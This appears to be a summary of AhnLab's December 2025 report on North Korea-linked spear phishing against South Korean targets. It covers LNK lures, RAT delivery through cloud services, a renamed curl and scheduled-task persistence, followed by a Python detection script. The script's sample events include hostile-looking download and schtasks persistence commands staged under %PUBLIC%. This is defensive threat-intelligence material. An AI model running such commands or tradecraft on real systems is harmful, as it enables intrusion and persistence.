December 2025 APT Attack Trends Report (Domestic)
2026-01-13 • AhnLab
AhnLab's December 2025 domestic APT trend report says spear phishing dominated observed attacks against South Korean targets, with LNK files accounting for the largest share that month. One LNK-based pattern executed malicious PowerShell from compressed attachments, used Dropbox API or Google Drive to fetch payloads, wrote scripts and obfuscated RAT malware under locations such as %PUBLIC%, and launched RATs including XenoRAT and RoKRAT for keylogging, screenshots, and operator-controlled actions. Another LNK pattern downloaded AutoIt malware by copying curl.exe under another filename, retrieving a normal AutoIt binary and malicious script, and registering scheduled tasks for persistence. DPRK-relevant lures in the excerpt include North Korean defector support paperwork and a 2025 North Korean human-rights youth academy lecture topic, showing continued use of Korean policy and social-issue themes in domestic spear-phishing tradecraft.
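
The behaviours summarized above map onto process-creation telemetry a defender can triage. The following is an added example, not code from AhnLab's report: it assumes Sysmon-style Event ID 1 fields (Image, OriginalFileName, CommandLine), assumes scheduled tasks are registered through schtasks.exe, and runs over constructed sample records with hypothetical file names.

```python
import ntpath

# Constructed Sysmon Event ID 1 style records (not taken from the report).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\upd.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"upd.exe -o C:\Users\Public\x.dat https://example.invalid/x"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe --version"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell -file C:\Users\Public\s.ps1"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r"schtasks /create /sc minute /tn T /tr C:\Users\Public\a.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": "schtasks /query"},
]

# Assumption: %PUBLIC% is the staging location, as in the report's first pattern.
STAGING_MARKERS = (r"\users\public", "%public%")


def classify(event):
    """Return the names of the rules a process-creation event matches."""
    name = ntpath.basename(event["Image"]).lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "").lower()
    staged = any(marker in cmd for marker in STAGING_MARKERS)
    hits = []
    # curl.exe copied under another filename: PE metadata still says curl.exe.
    if original == "curl.exe" and name != "curl.exe":
        hits.append("renamed_curl")
    # PowerShell operating on files under %PUBLIC%.
    if name in ("powershell.exe", "pwsh.exe") and staged:
        hits.append("powershell_public")
    # Scheduled task created for something staged under %PUBLIC%.
    if name == "schtasks.exe" and "/create" in cmd and staged:
        hits.append("task_from_public")
    return hits


def triage(events):
    """Map event index to matched rules, skipping events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}


if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, rules, SAMPLE_EVENTS[idx]["CommandLine"])
```

The renamed-binary rule relies on the PE OriginalFileName surviving a file copy, so it does not depend on the filename the copy was given.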